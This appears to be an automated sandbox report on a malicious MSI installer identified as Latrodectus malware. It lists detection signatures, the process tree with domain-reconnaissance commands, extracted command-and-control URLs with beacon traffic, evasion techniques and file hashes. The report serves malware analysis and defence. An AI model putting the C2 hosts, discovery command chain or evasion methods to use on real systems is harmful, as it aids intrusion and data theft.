Windows Analysis Report
ad.msi

Overview

General Information

Sample name: ad.msi
Analysis ID: 1431940
MD5: 666151c11b7899a0c764abe711d3f9b3
SHA1: 35462114e096f4d307607d713136bfe38479870d
SHA256: 8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
PE file contains section with special chars
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 5948 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3528 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7120 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSID8B1.tmp (PID: 2828 cmdline: "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 5668 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2624 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
      • cmd.exe (PID: 5428 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6788 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 5544 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5148 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 5560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 7160 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nltest.exe (PID: 1868 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
      • cmd.exe (PID: 6392 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nltest.exe (PID: 2604 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
      • cmd.exe (PID: 1900 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net.exe (PID: 2296 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • rundll32.exe (PID: 3664 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Name: Unidentified 111 (Latrodectus), Latrodectus | Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. | Attribution: No Attribution | Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111
{"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
Source | Rule | Description | Author | Strings
00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.210fe9f0000.0.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
6.2.rundll32.exe.1fb3ab70000.2.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
6.2.rundll32.exe.1fb3ab70000.2.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
6.2.rundll32.exe.1fb3ab60000.1.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
7.2.rundll32.exe.24739a10000.1.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security

System Summary

Source: Process started | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) | Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1900, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2296, ProcessName: net.exe
Source: Process started | Author: Endgame, JHasenbusch (ported for oscd.community) | Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1900, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2296, ProcessName: net.exe
Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2624, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 5428, ProcessName: cmd.exe
No Snort rule has matched

AV Detection

Source: 8.2.rundll32.exe.210fea00000.1.unpack | Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
Source: :wtfbbq (copy) | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\sharepoint\360total.dll | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll | Virustotal: Detection: 14%
Source: ad.msi | Virustotal: Detection: 8%
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: H-%8L
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: )b
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: $k$
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor:
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: h
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor:
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor:
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: !"#$%&'()*+,-./012345678
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor:
Source: 6.2.rundll32.exe.1fb3ab60000.1.unpack | String decryptor: @ !"#$%&'()*+,-./0123456789:;<=>?@
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,6_2_000000018003BC0C
Source: unknown | HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr

Spreading

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\msiexec.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\Installer\MSID8B1.tmp | Code function: 5_2_00B5AF79 FindFirstFileExW,5_2_00B5AF79
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB7A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_000001FB3AB7A350
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB71A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_000001FB3AB71A08
Source: C:\Windows\System32\rundll32.exe | Code function: 7_2_0000024739A4A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0000024739A4A350
Source: C:\Windows\System32\rundll32.exe | Code function: 7_2_0000024739A41A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_0000024739A41A08
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00000210FEA0A350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_00000210FEA0A350
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00000210FEA01A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_00000210FEA01A08

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 104.21.46.75 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 172.67.219.28 443
Source: Malware configuration extractor | URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor | URLs: https://wrankaget.site/live/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 252 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 180 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 180 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 180 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: grizmotras.com | Content-Length: 180 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: grizmotras.com | Content-Length: 180 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001FB3AB78D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_000001FB3AB78D90
Source: global traffic | DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic | DNS traffic detected: DNS query: grizmotras.com
Source: unknown | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: jarinamaers.shop | Content-Length: 252 | Cache-Control: no-cache
Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | String found in binary or memory: ftp://ftp%2desktop.ini
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rundll32.exe | String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | String found in binary or memory: http://dr.f.360.cn/scanlist
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
